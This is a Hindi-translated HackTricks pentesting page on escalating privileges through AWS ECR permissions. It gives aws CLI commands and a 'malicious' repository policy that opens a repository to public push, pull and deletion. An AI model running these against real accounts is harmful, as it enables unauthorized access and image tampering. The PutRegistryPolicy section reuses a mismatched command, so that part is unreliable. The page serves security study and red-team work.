AWS - ECR Privesc

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

एक हमलावर ecr:GetAuthorizationToken और ecr:BatchGetImage के साथ ECR में लॉगिन कर सकता है और छवियाँ डाउनलोड कर सकता है।

छवियों को कैसे डाउनलोड करें के बारे में अधिक जानकारी के लिए:

pageAWS - ECR Post Exploitation

संभावित प्रभाव: ट्रैफिक में संवेदनशील जानकारी को आधारित विशेषाधिकार द्वारा अप्रत्यक्ष प्रिवेस्क।

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

उन सभी अनुमतियों के साथ एक हमलावर ECR में लॉगिन कर सकता है और छवियाँ अपलोड कर सकता है। यह उन परिवेशों में विशेषाधिकारों को बढ़ाने के लिए उपयोगी हो सकता है जहां उन छवियों का उपयोग किया जा रहा है।

नई छवि अपलोड/अपडेट करने के लिए कैसे करें, इसे जानने के लिए देखें:

pageAWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

पिछले खंड की तरह, लेकिन सार्वजनिक रिपॉजिटरी के लिए।

ecr:SetRepositoryPolicy

इस अनुमति के साथ एक हमलावर रिपॉजिटरी नीति को बदल सकता है ताकि वह खुद को (या यहाँ तक कि सभी को) पढ़ने/लिखने का अधिकार प्रदान कर सके। उदाहरण के लिए, इस उदाहरण में सभी को पढ़ने का अधिकार दिया गया है।

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

संबंधित विषयों की सूची my-policy.json:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

ecr-public:SetRepositoryPolicy

पिछले खंड की तरह, लेकिन सार्वजनिक रिपॉजिटरी के लिए। हमलावर एक ECR सार्वजनिक रिपॉजिटरी की रिपॉजिटरी नीति को संशोधित कर सकता है ताकि अनधिकृत सार्वजनिक पहुंच या अपने विशेषाधिकारों को बढ़ा सके।

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

संभावित प्रभाव: ECR सार्वजनिक रिपॉजिटरी तक अनधिकृत पहुंच, जिससे किसी भी उपयोगकर्ता को छवियाँ पुश, पुल, या हटाने की अनुमति मिल सकती है।

ecr:PutRegistryPolicy

इस अनुमति वाले हमलावर व्यक्ति रजिस्ट्री नीति को बदल सकता है ताकि वह खुद को, अपने खाते को (या यहाँ तक कि सभी को) पढ़ने/लिखने की पहुंच प्रदान कर सके।

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

Last updated